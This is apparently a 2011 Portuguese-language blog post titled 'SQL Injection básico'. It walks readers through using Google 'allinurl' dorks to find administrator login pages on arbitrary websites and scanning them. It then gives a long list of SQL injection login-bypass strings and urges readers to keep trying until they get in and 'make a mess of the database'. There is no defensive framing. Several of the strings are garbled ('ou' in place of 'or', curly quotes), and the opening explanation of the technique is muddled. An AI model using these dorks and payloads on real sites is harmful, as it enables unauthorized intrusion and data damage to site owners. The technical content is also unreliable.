Pesquisar

22 de out de 2011

SQL Injection básico

É o seguinte, Este truque é aplicado ao navegador, no modo de string, que acessa o servidor, varrendo os cookies, e assim podendo liberar a entrada do administrador.

Google é seu amigo, e te ajudará nesta tarefa, pois ele te ajudará a pesquisar por páginas específicas.
Iremos então usar o comando "allinurl".
esse comando procura especificadamente aquilo que se vem depois dos dois pontos
exemplo: allinurl:/site/admin/
com esse codigo ele caçará paginas com campos de logins de adiministraçoes.
abaixo uma lista com algums codigos para vc pesquisar no google.


allinurl:/webadmin/default.asp
allinurl:/menu_admin/default.asp
allinurl:/menu_admin/index.asp
allinurl:/menu_admin/login.asp
allinurl:/noticias/admin/
allinurl:/news/admin/
allinurl:/cadastro/admin/
allinurl:/portal/admin/
allinurl:/site/admin/
allinurl:/home/admin.asp
allinurl:/home/admin/index.asp
allinurl:/home/admin/default.asp
allinurl:/home/admin/login.asp
allinurl:/web/admin/index.asp


Pegue uma das strings acima e pesquise a vontade:


Após isso saira uma lista de sites com paginas com campos de logins e senhas
ate ai tudo bem agora vamos escaniialos usando um scanner como o Acutinex
depois de scaneado e acuzando a suposta vulnerabilidade de sql injection

É só testarmos strings nos campos de login sda página afetada.


A mesma string usada no login deve ser usada no campo de senha ok.
abaixo uma lista de strings:

* b’ or ‘ 1=’
* ‘ or ‘1
* ‘ or ‘|
* ‘ or ‘a’='a
* ‘ or ”=’
* ‘ or 1=1–
* ‘) or (’a'=’a
* ‘ or ‘1′=’1
* admin ‘ – -
* ‘ ou 0=0 –
* “ou 0=0 –
* ou 0=0 –
* ‘ ou 0=0 #
* “ou 0=0 #
* ou 0=0 #
* ‘ ou ‘ x’='x
* “ou” x”=”x
* ‘) ou (’ x’='x
* ‘ ou 1=1 –
* “ou 1=1 –
* ou 1=1 –
* ‘ ou a=a –
* “ou” a”=”a
* ‘) ou (’ a’='a
* “) ou (”a”=”a
* hi “ou” a”=”a
* hi “ou 1=1 –
* hi ‘ ou 1=1 –
* hi ‘ ou ‘ a’='a
* hi ‘) ou (’ a’='a
* hi”) ou (”a”=”a
* ‘ or ‘x’='x


Teste até conseguir, faça uma confusão no Banco de dados.

Um comentário: